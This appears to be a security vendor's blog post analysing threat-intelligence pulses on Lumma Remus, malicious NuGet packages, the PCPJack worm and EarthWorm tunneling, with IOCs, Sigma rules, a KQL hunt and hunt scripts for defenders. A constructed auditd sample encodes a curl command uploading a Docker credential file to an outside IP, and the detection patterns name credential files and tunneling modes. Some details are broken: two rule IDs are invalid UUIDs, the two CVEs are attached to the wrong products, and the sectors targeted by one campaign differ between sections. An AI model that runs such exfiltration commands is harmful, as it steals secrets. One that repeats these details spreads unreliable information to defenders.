
Lumma Remus, NuGet Supply Chain & Cloud Credential Harvesting: OTX Pulse Analysis

Security Arsenal Team
May 9, 2026

Live OTX pulse data indicates a convergence of high-fidelity credential theft campaigns targeting both endpoints and cloud infrastructure. The threat landscape is dominated by the Remus variant of the Lumma Stealer, now active as a 64-bit infostealer utilizing EtherHiding for C2 resolvers. Concurrently, a sophisticated supply chain attack is underway via malicious NuGet packages impersonating Chinese UI libraries to deliver credential harvesters. In the cloud sphere, the PCPJack worm is actively exploiting containerized environments to evict the TeamPCP actor while harvesting credentials from Kubernetes and Docker configurations. Additionally, Operation GriefLure represents an APT-style campaign utilizing spear phishing with legal document lures to target telecom and healthcare sectors in Vietnam and the Philippines. Finally, a critical PAN-OS zero-day is being exploited to deploy tunneling tools like EarthWorm, facilitating lateral movement and credential exfiltration.

Collective Objective: The primary objective across these pulses is the mass harvesting of credentials (browser, crypto, SSH, cloud API keys) to establish persistent access and facilitate further exploitation or data exfiltration.

Threat Actor / Malware Profile

Malware: Lumma Stealer (Remus Variant)

  • Type: 64-bit Infostealer
  • Distribution: Initial access via typosquatted NuGet packages and cracked-software downloads.
  • Behavior: Targets browser credentials, cryptocurrency wallets, and two-factor authentication (2FA) extensions. The Remus variant employs EtherHiding to bypass network-based detection and uses anti-analysis checks to evade sandboxes.
  • C2 Communication: Utilizes blockchain transactions for C2 resolution (EtherHiding) to prevent takedown.

Malware: PCPJack

  • Type: Cloud Worm / Credential Theft Framework
  • Distribution: Exploits vulnerabilities in Kubernetes and Docker (e.g., CVE-2025-29927).
  • Behavior: Propagates across exposed cloud infrastructure, specifically targeting misconfigured containers. It systematically removes TeamPCP artifacts and harvests credentials from cloud metadata services, configuration files, and developer tools.
  • C2 Communication: Exfiltrates data to attacker-controlled infrastructure via covert channels.

Threat Actor: Operation GriefLure

  • Type: APT / Targeted Spear Phishing
  • Vector: Weaponized PDF documents masquerading as legal breach disputes and whistleblower complaints.
  • Behavior: Living-off-the-land (LotL) techniques to drop payloads (sfsvc.exe, 360.dll) aimed at stealing sensitive corporate data and credentials from high-value targets in the Defense and Healthcare sectors.

Tooling: EarthWorm / ReverseSocks5

  • Context: Deployed following the exploitation of PAN-OS CVE-2023-33538.
  • Behavior: SOCKS5 proxying and tunneling tools used to pivot internally from compromised perimeter firewalls, enabling credential dumping on internal network segments.

IOC Analysis

The provided pulses contain a mix of infrastructure and file-based indicators:

  • Domains/URLs: Numerous C2 domains such as dns-providersa2.com, forestoaker.com, and lastpass-login-help.com (typosquatting). These should be blocked immediately at the DNS and Proxy level.
  • File Hashes: SHA256 and MD5 hashes associated with .NET payloads (NuGet), Lumma binaries, and PCPJack droppers. These indicate specific files on disk or in memory.
  • CVEs: Critical vulnerabilities including CVE-2025-29927 (K8s/Docker) and CVE-2023-33538 (PAN-OS) are primary exploitation vectors.

Operational Guidance: SOC teams should load the file hashes into EDR threat feeds and block the domains. CVE data should be cross-referenced with vulnerability management platforms to identify exposed assets.
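Loading the indicators above into a feed is only useful if each one is bucketed correctly: the pulse mixes domains with MD5, SHA-1 and SHA-256 digests, and a SHA-1 compared against a SHA-256 column never matches. The following Python is an added example, not part of the pulse or of Security Arsenal's tooling. It classifies the indicators by type, rejects anything it cannot place, and matches them against a few constructed DNS and process records (the records, the "0x41414141" entry and the subdomain "cdn.forestoaker.com" are made up for the demonstration; the other values are the ones listed above).

```python
"""Bucket OTX pulse indicators by type and match them against log records."""
import re
from dataclasses import dataclass, field

# Indicators taken from the IOC Analysis section above, plus one constructed
# malformed entry ("0x41414141") to exercise the rejection path.
RAW_IOCS = [
    "dns-providersa2.com", "forestoaker.com", "lastpass-login-help.com",
    "efb675de4b3af3dac3c9cae91075fd7cc2f4f98e",                            # 40 hex chars: SHA-1
    "019e6c2cf58386039133981f3377b085fbd70c98ae8613c7c6a4f10a9f2d9824",    # SHA-256
    "b037fa1dd769891b538d9ca26131890c93e3458eec96c5354bdebe50d04a5b3d",    # SHA-256
    "0x41414141",                                                          # constructed: neither hash nor domain
]

HASH_ALGO_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256"}
HEX_RE = re.compile(r"^[0-9a-f]+$")
DOMAIN_RE = re.compile(r"^(?=.{1,253}$)([a-z0-9-]{1,63}\.)+[a-z]{2,}$")


@dataclass
class IocSet:
    domains: set = field(default_factory=set)
    hashes: dict = field(default_factory=lambda: {"md5": set(), "sha1": set(), "sha256": set()})
    rejected: list = field(default_factory=list)


def load_iocs(raw):
    """Normalise to lowercase and place each indicator in the bucket its shape implies."""
    iocs = IocSet()
    for item in raw:
        value = item.strip().lower()
        if HEX_RE.match(value) and len(value) in HASH_ALGO_BY_LEN:
            iocs.hashes[HASH_ALGO_BY_LEN[len(value)]].add(value)
        elif DOMAIN_RE.match(value):
            iocs.domains.add(value)
        else:
            iocs.rejected.append(item)   # surface these for manual review instead of silently dropping them
    return iocs


def domain_matches(iocs, host):
    """True if host equals a listed domain or is a subdomain of one (label boundary respected)."""
    host = host.rstrip(".").lower()
    return any(host == d or host.endswith("." + d) for d in iocs.domains)


def hash_matches(iocs, digest):
    """Compare a digest only against the bucket for its own algorithm."""
    digest = digest.strip().lower()
    algo = HASH_ALGO_BY_LEN.get(len(digest))
    return algo is not None and digest in iocs.hashes[algo]


# Constructed sample records; field names are hypothetical, not a real EDR schema.
SAMPLE_RECORDS = [
    {"type": "dns", "host": "cdn.forestoaker.com"},      # subdomain of a listed C2 domain
    {"type": "dns", "host": "notforestoaker.com"},       # different registrable domain: must not match
    {"type": "process", "sha1": "EFB675DE4B3AF3DAC3C9CAE91075FD7CC2F4F98E"},   # uppercase SHA-1
    {"type": "process", "sha256": "019e6c2cf58386039133981f3377b085fbd70c98ae8613c7c6a4f10a9f2d9824"},
    {"type": "process", "sha256": "0" * 64},             # benign
]


def scan(records, iocs):
    """Return (indicator_type, value) for every record that matches a bucketed indicator."""
    hits = []
    for rec in records:
        if rec["type"] == "dns" and domain_matches(iocs, rec["host"]):
            hits.append(("domain", rec["host"]))
        for algo in ("md5", "sha1", "sha256"):
            if algo in rec and hash_matches(iocs, rec[algo]):
                hits.append((algo, rec[algo].lower()))
    return hits


if __name__ == "__main__":
    loaded = load_iocs(RAW_IOCS)
    print("rejected:", loaded.rejected)
    for hit in scan(SAMPLE_RECORDS, loaded):
        print("HIT", hit)
```

Note that the suffix check in `domain_matches` requires a dot before the listed domain, so "notforestoaker.com" is not treated as a match; a plain `endswith` would have produced that false positive.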

Detection Engineering

```yaml
title: Suspicious NuGet Package Execution - Supply Chain Attack
id: 488417de-1c5b-4d4b-a4f9-658411c7d1e8
description: Detects execution of processes spawned from NuGet packages or msbuild.exe involving suspicious paths or obfuscation often associated with the malicious NuGet campaign impersonating Chinese libraries.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/663b8e8d8f4c6a3a2c5e6b7a
tags:
    - attack.initial_access
    - attack.t1195.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\msbuild.exe'
            - '\nuget.exe'
            - '\dotnet.exe'
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\rundll32.exe'
    condition: selection
falsepositives:
    - Legitimate build processes
level: high
---
title: Potential EarthWorm Tunneling Tool Execution
id: 592718df-2d6c-5e5c-b5g0-769522d8e2f9
description: Detects execution of EarthWorm or similar tunneling utilities often deployed after PAN-OS exploitation for lateral movement.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/663b8e8d8f4c6a3a2c5e6b7e
tags:
    - attack.command_and_control
    - attack.t1572
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        # 'endswith' on the file name rather than 'contains': a bare 'ew.exe'
        # substring also matches names such as view.exe or renew.exe.
        Image|endswith:
            - '\ew.exe'
            - '\ew_for_win.exe'
            - '\re_georg.exe'
    selection_cli:
        # EarthWorm is invoked as 'ew -s <mode> ...'. Matching the bare '-s',
        # '-l' and '-e' switches, as an earlier draft did, fires on almost
        # every command line on the host; the mode names are specific to the tool.
        CommandLine|contains:
            - ' -s ssocksd'
            - ' -s rcsocks'
            - ' -s rssocks'
            - ' -s lcx_'
    condition: 1 of selection*
falsepositives:
    - Rare legitimate administrative use of tunneling tools
level: critical
---
title: PCPJack Cloud Container Credential Access
id: 603829eg-3e7d-6f6d-c6h1-870633e9f3g0
description: Detects attempts to access cloud credentials or kubeconfig files by unauthorized processes or containers, indicative of PCPJack or similar cloud worms.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/663b8e8d8f4c6a3a2c5e6b7c
tags:
    - attack.credential_access
    - attack.t1552.001
logsource:
    product: linux
    service: auditd
detection:
    # In raw auditd output the PATH and PROCTITLE records are separate lines
    # that share one event serial, and proctitle is hex-encoded whenever the
    # command line contains spaces. The collector must join the records and
    # decode proctitle before the two selections below can be evaluated together.
    selection_access:
        type: 'PATH'
        name|contains:
            - '/.kube/config'
            - '/.aws/credentials'
            - '/.docker/config.'
    selection_context:
        proctitle|contains:
            - 'cat'
            - 'base64'
            - 'curl'
    condition: selection_access and selection_context
falsepositives:
    - Legitimate administration by authorized users
level: high
```
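The third rule only works if the pipeline feeding it has already joined the auditd records of one event and decoded the hex-encoded proctitle; many collectors ship each record as its own line, and the rule then never matches. The Python below is an added example (not code from the pulse or from Security Arsenal) that performs that reassembly and applies the rule's logic over constructed auditd lines. The event serials, PIDs, paths and the upload destination in the samples are invented; the hex encoding is produced the same way auditd does it, with the argv elements NUL-separated.

```python
"""Reassemble raw auditd records by event serial and apply the PCPJack credential-file rule."""
import re
from collections import defaultdict

MSG_RE = re.compile(r"^type=(?P<type>\w+) msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): (?P<body>.*)$")
KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')

# auditd quotes plain string values; these fields are hex-encoded when they
# contain spaces, quotes or control characters.
HEX_ENCODED_FIELDS = {"name", "proctitle", "comm", "exe", "cwd"}

CRED_PATHS = ("/.kube/config", "/.aws/credentials", "/.docker/config.")
READER_TOOLS = ("cat", "base64", "curl")


def decode_hex(value):
    """Decode an auditd hex string; NUL separators in proctitle become spaces."""
    if re.fullmatch(r"[0-9A-Fa-f]+", value) and len(value) % 2 == 0:
        return bytes.fromhex(value).decode("utf-8", "replace").replace("\x00", " ")
    return value


def parse_record(line):
    """Split one raw record into (type, serial, fields); None if the line is not audit output."""
    m = MSG_RE.match(line.strip())
    if not m:
        return None
    fields = {}
    for key, raw, quoted in KV_RE.findall(m.group("body")):
        if raw.startswith('"'):
            fields[key] = quoted
        elif key in HEX_ENCODED_FIELDS:
            fields[key] = decode_hex(raw)
        else:
            fields[key] = raw
    return m.group("type"), m.group("serial"), fields


def group_events(lines):
    """Join SYSCALL, PATH and PROCTITLE records that share an event serial."""
    events = defaultdict(lambda: {"SYSCALL": None, "PATH": [], "PROCTITLE": None})
    for line in lines:
        parsed = parse_record(line)
        if parsed is None:
            continue
        rtype, serial, fields = parsed
        if rtype == "PATH":
            events[serial]["PATH"].append(fields.get("name", ""))
        elif rtype == "PROCTITLE":
            events[serial]["PROCTITLE"] = fields.get("proctitle", "")
        elif rtype == "SYSCALL":
            events[serial]["SYSCALL"] = fields
    return events


def matches_rule(ev):
    """selection_access AND selection_context, using the tool's basename rather than a substring."""
    path_hit = any(p in name for name in ev["PATH"] for p in CRED_PATHS)
    title = ev["PROCTITLE"] or ""
    argv0 = title.split(" ", 1)[0].rsplit("/", 1)[-1]   # stricter than 'contains': "catalog" does not match
    return path_hit and argv0 in READER_TOOLS


def find_hits(lines):
    """Serials of reassembled events that satisfy the rule, in ascending order."""
    return sorted(serial for serial, ev in group_events(lines).items() if matches_rule(ev))


def _proctitle_hex(argv):
    """Encode argv the way auditd does for PROCTITLE: NUL-joined, hex, uppercase."""
    return "\x00".join(argv).encode().hex().upper()


# Constructed sample events (serials 1001-1004); none of this is real host data.
SAMPLE_AUDITD = [
    'type=SYSCALL msg=audit(1715241600.101:1001): arch=c000003e syscall=257 success=yes exit=3 pid=4242 uid=1000 comm="cat" exe="/usr/bin/cat" key="cred_files"',
    'type=PATH msg=audit(1715241600.101:1001): item=0 name="/root/.kube/config" inode=9001 nametype=NORMAL',
    f'type=PROCTITLE msg=audit(1715241600.101:1001): proctitle={_proctitle_hex(["cat", "/root/.kube/config"])}',
    'type=SYSCALL msg=audit(1715241600.102:1002): arch=c000003e syscall=257 success=yes exit=3 pid=4243 uid=1000 comm="vim" exe="/usr/bin/vim" key="cred_files"',
    'type=PATH msg=audit(1715241600.102:1002): item=0 name="/home/dev/.aws/credentials" inode=9002 nametype=NORMAL',
    f'type=PROCTITLE msg=audit(1715241600.102:1002): proctitle={_proctitle_hex(["vim", "/home/dev/.aws/credentials"])}',
    'type=SYSCALL msg=audit(1715241600.103:1003): arch=c000003e syscall=257 success=yes exit=3 pid=4244 uid=0 comm="curl" exe="/usr/bin/curl" key="cred_files"',
    'type=PATH msg=audit(1715241600.103:1003): item=0 name="/root/.docker/config.json" inode=9003 nametype=NORMAL',
    f'type=PROCTITLE msg=audit(1715241600.103:1003): proctitle={_proctitle_hex(["/usr/bin/curl", "-T", "/root/.docker/config.json", "http://203.0.113.10/up"])}',
    'type=SYSCALL msg=audit(1715241600.104:1004): arch=c000003e syscall=257 success=yes exit=3 pid=4245 uid=1000 comm="base64" exe="/usr/bin/base64" key="cred_files"',
    'type=PATH msg=audit(1715241600.104:1004): item=0 name="/etc/hostname" inode=9004 nametype=NORMAL',
    'type=PROCTITLE msg=audit(1715241600.104:1004): proctitle="base64"',
]

if __name__ == "__main__":
    for serial in find_hits(SAMPLE_AUDITD):
        ev = group_events(SAMPLE_AUDITD)[serial]
        print(f"[ALERT] event {serial}: {ev['PROCTITLE']} touched {ev['PATH']}")
```

Event 1002 (an editor opening the AWS credentials file) and event 1004 (base64 over an unrelated file) fall through, while 1001 and 1003 are reported; the second of those is only visible because the hex proctitle was decoded before the tool name was compared.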


```kql
// Hunt for network connections to known IOCs and suspicious file executions
let IOCDomains = dynamic(["dns-providersa2.com", "forestoaker.com", "krondez.com", "baxe.pics", "lastpass-login-help.com", "vinte.online", "remnane.biz"]);
// Hashes are kept per algorithm: the 40-character value is a SHA-1 and can never
// match a SHA256 column, so it is compared against the SHA1 columns instead.
let IOCSHA1 = dynamic(["efb675de4b3af3dac3c9cae91075fd7cc2f4f98e"]);
let IOCSHA256 = dynamic(["019e6c2cf58386039133981f3377b085fbd70c98ae8613c7c6a4f10a9f2d9824", "b037fa1dd769891b538d9ca26131890c93e3458eec96c5354bdebe50d04a5b3d"]);
// Network Connections
DeviceNetworkEvents
| where RemoteUrl in~ IOCDomains
    or InitiatingProcessSHA256 in~ IOCSHA256
    or InitiatingProcessSHA1 in~ IOCSHA1
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort
| union (
    // Process Creation for specific hashes
    DeviceProcessEvents
    | where SHA256 in~ IOCSHA256 or SHA1 in~ IOCSHA1
    | project Timestamp, DeviceName, AccountName, ProcessCommandLine, FolderPath, SHA256, SHA1
)
| order by Timestamp desc
```


```powershell
<#
.SYNOPSIS
    IOC Hunt Script for Lumma Stealer, NuGet Malware, and PCPJack artifacts.
.DESCRIPTION
    Scans the file system for specific SHA256 hashes and suspicious NuGet package paths.
#>

$TargetHashes = @(
    "019e6c2cf58386039133981f3377b085fbd70c98ae8613c7c6a4f10a9f2d9824",
    "34e2d63b5db7e24c808711c2ca0c0a42afde97a0086d7d81609110c002d18d7c",
    "596c453c9dbb7240f1ce05cc025496524ce7c538c23a9b2171174bf32b5691a1",
    "b037fa1dd769891b538d9ca26131890c93e3458eec96c5354bdebe50d04a5b3d",
    "e41c635e4c3514e266d143d544ad1abde5db3dcfe6cccdf9bb7a218003f8ab6a"
)

Write-Host "Starting IOC Hunt..."

# Scan User Profiles for Browser/Stealer related paths
$PathsToScan = @("$env:USERPROFILE\AppData\Local", "$env:USERPROFILE\AppData\Roaming", "C:\Users\")

foreach ($Path in $PathsToScan) {
    if (Test-Path $Path) {
        Write-Host "Scanning $Path for malicious binaries..."
        # Files only, skipping empty files and anything over 10 MB to keep hashing time reasonable
        Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue | Where-Object {
            $_.Length -gt 0kb -and $_.Length -lt 10mb
        } | ForEach-Object {
            $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            # -in is case-insensitive by default, so the uppercase output of Get-FileHash matches the list
            if ($Hash -in $TargetHashes) {
                Write-Host "[ALERT] Malicious file found: $($_.FullName) with Hash: $Hash" -ForegroundColor Red
            }
        }
    }
}

# Check for suspicious NuGet packages (bmrxntfj account)
$NugetPath = "$env:USERPROFILE\.nuget\packages"
if (Test-Path $NugetPath) {
    Write-Host "Checking NuGet packages for typosquatted libraries..."
    Get-ChildItem -Path $NugetPath -Recurse -Directory | Where-Object { $_.Name -like "*UI*" -or $_.Name -like "*Chinese*" } | Select-Object FullName
}

Write-Host "Hunt Complete."
```


Response Priorities

  • Immediate: Block all listed domains and IP addresses at the perimeter and DNS resolvers. Scan endpoints for the file hashes provided in the IOC Analysis. Identify and isolate any hosts with detected PAN-OS exploitation logs or unusual EarthWorm process execution.
  • 24 Hours: If credential-stealing malware (Lumma/Remus) is suspected, force a password reset for all browser-stored credentials and cryptocurrency wallets. Audit cloud environments (K8s/Docker) for signs of unauthorized access and rotate API keys.
  • 1 Week: Audit the software supply chain; remove any NuGet packages associated with the account bmrxntfj. Patch all PAN-OS firewalls against CVE-2023-33538 and related CVEs immediately. Review and restrict lateral movement capabilities from perimeter devices.
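The supply-chain audit above is easier to act on if it flags packages whose IDs are near-misses of the libraries a project actually intends to use, rather than relying on a wildcard such as "*UI*". The Python below is an added example, not part of the pulse or of Security Arsenal's scripts: it reads the PackageReference entries of a .csproj and reports any ID within an optimal-string-alignment (Damerau-Levenshtein) distance of 2 of an allowlisted name without being that name. The allowlist and the sample project file are constructed; "Example.UI.Blazor" is a hypothetical package name standing in for whichever UI library a team depends on, and the near-miss IDs are invented for the demonstration.

```python
"""Flag NuGet PackageReference IDs that are near-misses of allowlisted library names."""
import xml.etree.ElementTree as ET

# Constructed allowlist: the packages this (hypothetical) project is expected to use.
TRUSTED_PACKAGES = ("Newtonsoft.Json", "Serilog", "Example.UI.Blazor")

# Constructed .csproj with two legitimate references and three near-miss IDs.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <TargetFramework>net8.0</TargetFramework>
  </PropertyGroup>
  <ItemGroup>
    <PackageReference Include="Newtonsoft.Json" Version="13.0.3" />
    <PackageReference Include="Newtonsoft.Jsson" Version="13.0.3" />
    <PackageReference Include="Seri1og" Version="3.1.1" />
    <PackageReference Include="Example.UI.Blazor" Version="2.0.0" />
    <PackageReference Include="Exampel.UI.Blazor" Version="2.0.0" />
  </ItemGroup>
</Project>
"""


def osa_distance(a, b):
    """Optimal string alignment distance: edits plus adjacent transpositions, case-insensitive."""
    a, b = a.lower(), b.lower()
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)   # transposition
    return d[len(a)][len(b)]


def package_references(csproj_xml):
    """(Include, Version) for every PackageReference element in an SDK-style project file."""
    root = ET.fromstring(csproj_xml)
    return [(el.get("Include"), el.get("Version"))
            for el in root.iter("PackageReference") if el.get("Include")]


def find_typosquats(csproj_xml, trusted, max_distance=2):
    """Return (package, version, closest_trusted, distance) for IDs that nearly match the allowlist."""
    trusted_lower = {t.lower() for t in trusted}
    findings = []
    for pkg, version in package_references(csproj_xml):
        if pkg.lower() in trusted_lower:
            continue                       # exact allowlisted name: nothing to report
        closest = min(trusted, key=lambda t: osa_distance(pkg, t))
        dist = osa_distance(pkg, closest)
        if dist <= max_distance:
            findings.append((pkg, version, closest, dist))
    return findings


if __name__ == "__main__":
    for pkg, version, closest, dist in find_typosquats(SAMPLE_CSPROJ, TRUSTED_PACKAGES):
        print(f"[REVIEW] {pkg} {version}: {dist} edit(s) from trusted package {closest}")
```

In a real audit the allowlist comes from the project's lock file or an internal feed, and a finding means the reference is checked against the package's publisher before the build is trusted again; an ID that is not on the allowlist at all is a separate, lower-urgency review item.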
